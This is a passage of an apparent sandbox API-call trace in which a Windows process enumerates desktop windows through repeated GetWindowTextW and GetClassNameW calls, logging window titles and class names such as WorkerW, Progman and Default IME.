nMaxCount=1024 | out: lpString="") returned 0 [0203.378] GetClassNameW (in: hWnd=0x10118, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TabletModeCoverWindow") returned 21 [0203.378] GetWindowTextW (in: hWnd=0x20152, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.378] GetClassNameW (in: hWnd=0x20152, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.378] GetWindowTextW (in: hWnd=0x1019a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.378] GetClassNameW (in: hWnd=0x1019a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.378] GetWindowTextW (in: hWnd=0x10116, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.379] GetClassNameW (in: hWnd=0x10116, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0203.379] GetWindowTextW (in: hWnd=0x1010e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.379] GetClassNameW (in: hWnd=0x1010e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0203.379] GetWindowTextW (in: hWnd=0x100f4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.379] GetClassNameW (in: hWnd=0x100f4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.379] GetWindowTextW (in: hWnd=0x100f0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Windows Push Notifications Platform") returned 35 [0203.380] GetClassNameW (in: hWnd=0x100f0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0203.380] GetWindowTextW (in: hWnd=0x100ee, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0203.380] GetClassNameW (in: hWnd=0x100ee, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0203.380] GetWindowTextW (in: hWnd=0x100ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.380] GetClassNameW (in: hWnd=0x100ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0203.380] GetWindowTextW (in: hWnd=0x100e6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.380] GetClassNameW (in: hWnd=0x100e6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.380] GetWindowTextW (in: hWnd=0x100e4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.381] GetClassNameW (in: hWnd=0x100e4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.381] GetWindowTextW (in: hWnd=0x200da, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.381] GetClassNameW (in: hWnd=0x200da, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.381] GetWindowTextW (in: hWnd=0x100c0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.381] GetClassNameW (in: hWnd=0x100c0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.382] GetWindowTextW (in: hWnd=0x702b8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.382] GetClassNameW (in: hWnd=0x702b8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0203.382] GetWindowTextW (in: hWnd=0x20040, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MS_WebcheckMonitor") returned 18 [0203.382] GetClassNameW (in: hWnd=0x20040, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0203.382] GetWindowTextW (in: hWnd=0x2001c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="BluetoothNotificationAreaIconWindowClass") returned 40 [0203.382] GetClassNameW (in: hWnd=0x2001c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0203.382] GetWindowTextW (in: hWnd=0x20030, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Windows Shell Experience Host") returned 29 [0203.383] GetClassNameW (in: hWnd=0x20030, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0203.383] GetWindowTextW (in: hWnd=0x2002e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.383] GetClassNameW (in: hWnd=0x2002e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="PNIHiddenWnd") returned 12 [0203.383] GetWindowTextW (in: hWnd=0x40038, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.384] GetClassNameW (in: hWnd=0x40038, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.384] GetWindowTextW (in: hWnd=0x101cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.384] GetClassNameW (in: hWnd=0x101cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.384] GetWindowTextW (in: hWnd=0x101c8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.384] GetClassNameW (in: hWnd=0x101c8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0203.384] GetWindowTextW (in: hWnd=0x100ac, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.384] GetClassNameW (in: hWnd=0x100ac, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0203.385] GetWindowTextW (in: hWnd=0x10078, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.385] GetClassNameW (in: hWnd=0x10078, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0203.385] GetWindowTextW (in: hWnd=0x10074, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.385] GetClassNameW (in: hWnd=0x10074, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0203.385] GetWindowTextW (in: hWnd=0x10022, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DWM Notification Window") returned 23 [0203.385] GetClassNameW (in: hWnd=0x10022, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Dwm") returned 3 [0203.386] GetWindowTextW (in: hWnd=0x2002a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.386] GetClassNameW (in: hWnd=0x2002a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="CicLoaderWndClass") returned 17 [0203.386] GetWindowTextW (in: hWnd=0x3035e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.386] GetClassNameW (in: hWnd=0x3035e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0203.386] GetWindowTextW (in: hWnd=0x100d0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Program Manager") returned 15 [0203.386] GetClassNameW (in: hWnd=0x100d0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Progman") returned 7 [0203.387] GetWindowTextW (in: hWnd=0x1012a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.387] GetClassNameW (in: hWnd=0x1012a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.387] GetWindowTextW (in: hWnd=0x100ce, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0203.387] GetClassNameW (in: hWnd=0x100ce, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0203.387] GetWindowTextW (in: hWnd=0x10082, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.387] GetClassNameW (in: hWnd=0x10082, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.387] GetWindowTextW (in: hWnd=0xb031c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.388] GetClassNameW (in: hWnd=0xb031c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.388] GetWindowTextW (in: hWnd=0x601d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.388] GetClassNameW (in: hWnd=0x601d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.388] GetWindowTextW (in: hWnd=0x103a0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.388] GetClassNameW (in: hWnd=0x103a0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.389] GetWindowTextW (in: hWnd=0x1039e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.389] GetClassNameW (in: hWnd=0x1039e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.389] GetWindowTextW (in: hWnd=0x1039c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.389] GetClassNameW (in: hWnd=0x1039c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.389] GetWindowTextW (in: hWnd=0x1039a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.389] GetClassNameW (in: hWnd=0x1039a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.389] GetWindowTextW (in: hWnd=0x20224, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.390] GetClassNameW (in: hWnd=0x20224, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.390] GetWindowTextW (in: hWnd=0x10398, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.390] GetClassNameW (in: hWnd=0x10398, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.390] GetWindowTextW (in: hWnd=0x10394, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.390] GetClassNameW (in: hWnd=0x10394, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.390] GetWindowTextW (in: hWnd=0x10392, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.390] GetClassNameW (in: hWnd=0x10392, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.390] GetWindowTextW (in: hWnd=0x10390, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.391] GetClassNameW (in: hWnd=0x10390, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.391] GetWindowTextW (in: hWnd=0x10388, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.391] GetClassNameW (in: hWnd=0x10388, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.391] GetWindowTextW (in: hWnd=0x10386, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.392] GetClassNameW (in: hWnd=0x10386, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.392] GetWindowTextW (in: hWnd=0x10384, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.392] GetClassNameW (in: hWnd=0x10384, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.392] GetWindowTextW (in: hWnd=0x10382, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.392] GetClassNameW (in: hWnd=0x10382, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.392] GetWindowTextW (in: hWnd=0x2021a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.392] GetClassNameW (in: hWnd=0x2021a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.393] GetWindowTextW (in: hWnd=0x10380, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.393] GetClassNameW (in: hWnd=0x10380, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.393] GetWindowTextW (in: hWnd=0x1037e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.393] GetClassNameW (in: hWnd=0x1037e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.393] GetWindowTextW (in: hWnd=0x1037c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.393] GetClassNameW (in: hWnd=0x1037c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.394] GetWindowTextW (in: hWnd=0x1037a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.394] GetClassNameW (in: hWnd=0x1037a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.394] GetWindowTextW (in: hWnd=0x10378, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.394] GetClassNameW (in: hWnd=0x10378, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.394] GetWindowTextW (in: hWnd=0x10376, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.394] GetClassNameW (in: hWnd=0x10376, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.394] GetWindowTextW (in: hWnd=0x10374, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.395] GetClassNameW (in: hWnd=0x10374, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.395] GetWindowTextW (in: hWnd=0x10372, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.395] GetClassNameW (in: hWnd=0x10372, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.395] GetWindowTextW (in: hWnd=0x10370, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.395] GetClassNameW (in: hWnd=0x10370, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.395] GetWindowTextW (in: hWnd=0x1036e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.395] GetClassNameW (in: hWnd=0x1036e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.395] GetWindowTextW (in: hWnd=0x1036c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.396] GetClassNameW (in: hWnd=0x1036c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.396] GetWindowTextW (in: hWnd=0x10368, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.396] GetClassNameW (in: hWnd=0x10368, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.396] GetWindowTextW (in: hWnd=0x10362, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.396] GetClassNameW (in: hWnd=0x10362, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.396] GetWindowTextW (in: hWnd=0x10360, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.396] GetClassNameW (in: hWnd=0x10360, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.397] GetWindowTextW (in: hWnd=0x1035a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.397] GetClassNameW (in: hWnd=0x1035a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.397] GetWindowTextW (in: hWnd=0x10358, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.397] GetClassNameW (in: hWnd=0x10358, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.397] GetWindowTextW (in: hWnd=0x10356, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.397] GetClassNameW (in: hWnd=0x10356, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.397] GetWindowTextW (in: hWnd=0x10354, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.398] GetClassNameW (in: hWnd=0x10354, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.398] GetWindowTextW (in: hWnd=0x10352, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.398] GetClassNameW (in: hWnd=0x10352, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.398] GetWindowTextW (in: hWnd=0x10350, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.398] GetClassNameW (in: hWnd=0x10350, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.398] GetWindowTextW (in: hWnd=0x1034e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.399] GetClassNameW (in: hWnd=0x1034e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.399] GetWindowTextW (in: hWnd=0x1034c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.399] GetClassNameW (in: hWnd=0x1034c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.399] GetWindowTextW (in: hWnd=0x1034a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.399] GetClassNameW (in: hWnd=0x1034a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.399] GetWindowTextW (in: hWnd=0x10348, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.399] GetClassNameW (in: hWnd=0x10348, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.399] GetWindowTextW (in: hWnd=0x10346, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.400] GetClassNameW (in: hWnd=0x10346, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.400] GetWindowTextW (in: hWnd=0x20216, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.400] GetClassNameW (in: hWnd=0x20216, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.400] GetWindowTextW (in: hWnd=0x1033c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.400] GetClassNameW (in: hWnd=0x1033c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.400] GetWindowTextW (in: hWnd=0x10334, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.401] GetClassNameW (in: hWnd=0x10334, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.401] GetWindowTextW (in: hWnd=0x10326, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.401] GetClassNameW (in: hWnd=0x10326, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.402] GetWindowTextW (in: hWnd=0x1030e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.402] GetClassNameW (in: hWnd=0x1030e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.402] GetWindowTextW (in: hWnd=0x1030c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.402] GetClassNameW (in: hWnd=0x1030c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.402] GetWindowTextW (in: hWnd=0x1030a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.402] GetClassNameW (in: hWnd=0x1030a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.402] GetWindowTextW (in: hWnd=0x10312, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.403] GetClassNameW (in: hWnd=0x10312, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.403] GetWindowTextW (in: hWnd=0x20208, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.403] GetClassNameW (in: hWnd=0x20208, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.403] GetWindowTextW (in: hWnd=0x1027a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.403] GetClassNameW (in: hWnd=0x1027a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.403] GetWindowTextW (in: hWnd=0x10278, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.404] GetClassNameW (in: hWnd=0x10278, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.404] GetWindowTextW (in: hWnd=0x10276, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.404] GetClassNameW (in: hWnd=0x10276, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.404] GetWindowTextW (in: hWnd=0x10274, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.404] GetClassNameW (in: hWnd=0x10274, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.404] GetWindowTextW (in: hWnd=0x20202, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.404] GetClassNameW (in: hWnd=0x20202, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.404] GetWindowTextW (in: hWnd=0x10272, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.405] GetClassNameW (in: hWnd=0x10272, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.405] GetWindowTextW (in: hWnd=0x10270, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.405] GetClassNameW (in: hWnd=0x10270, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.405] GetWindowTextW (in: hWnd=0x1026e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.405] GetClassNameW (in: hWnd=0x1026e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.405] GetWindowTextW (in: hWnd=0x1025e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.405] GetClassNameW (in: hWnd=0x1025e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.405] GetWindowTextW (in: hWnd=0x10250, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.405] GetClassNameW (in: hWnd=0x10250, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.406] GetWindowTextW (in: hWnd=0x1024a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.406] GetClassNameW (in: hWnd=0x1024a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.406] GetWindowTextW (in: hWnd=0x10248, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.406] GetClassNameW (in: hWnd=0x10248, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.406] GetWindowTextW (in: hWnd=0x10246, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.406] GetClassNameW (in: hWnd=0x10246, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.406] GetWindowTextW (in: hWnd=0x10238, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.406] GetClassNameW (in: hWnd=0x10238, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.406] GetWindowTextW (in: hWnd=0x10228, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.444] GetClassNameW (in: hWnd=0x10228, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.444] GetWindowTextW (in: hWnd=0x10220, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.444] GetClassNameW (in: hWnd=0x10220, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.444] GetWindowTextW (in: hWnd=0x1021c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.444] GetClassNameW (in: hWnd=0x1021c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.445] GetWindowTextW (in: hWnd=0x10212, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.445] GetClassNameW (in: hWnd=0x10212, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.445] GetWindowTextW (in: hWnd=0x10210, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.445] GetClassNameW (in: hWnd=0x10210, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.445] GetWindowTextW (in: hWnd=0x40194, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.445] GetClassNameW (in: hWnd=0x40194, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.446] GetWindowTextW (in: hWnd=0x101c0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.446] GetClassNameW (in: hWnd=0x101c0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.446] GetWindowTextW (in: hWnd=0x101a8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.446] GetClassNameW (in: hWnd=0x101a8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.446] GetWindowTextW (in: hWnd=0x10190, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.446] GetClassNameW (in: hWnd=0x10190, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.446] GetWindowTextW (in: hWnd=0x100f6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0203.447] GetClassNameW (in: hWnd=0x100f6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0203.447] GetWindowTextW (in: hWnd=0x100f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.447] GetClassNameW (in: hWnd=0x100f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.447] GetWindowTextW (in: hWnd=0x100e8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.447] GetClassNameW (in: hWnd=0x100e8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.447] GetWindowTextW (in: hWnd=0x100dc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.447] GetClassNameW (in: hWnd=0x100dc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.448] GetWindowTextW (in: hWnd=0x401ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.448] GetClassNameW (in: hWnd=0x401ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.448] GetWindowTextW (in: hWnd=0x2003c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.448] GetClassNameW (in: hWnd=0x2003c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.448] GetWindowTextW (in: hWnd=0x101ca, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.448] GetClassNameW (in: hWnd=0x101ca, lpClassName=0x7df1a8, nMaxCount=1024 | 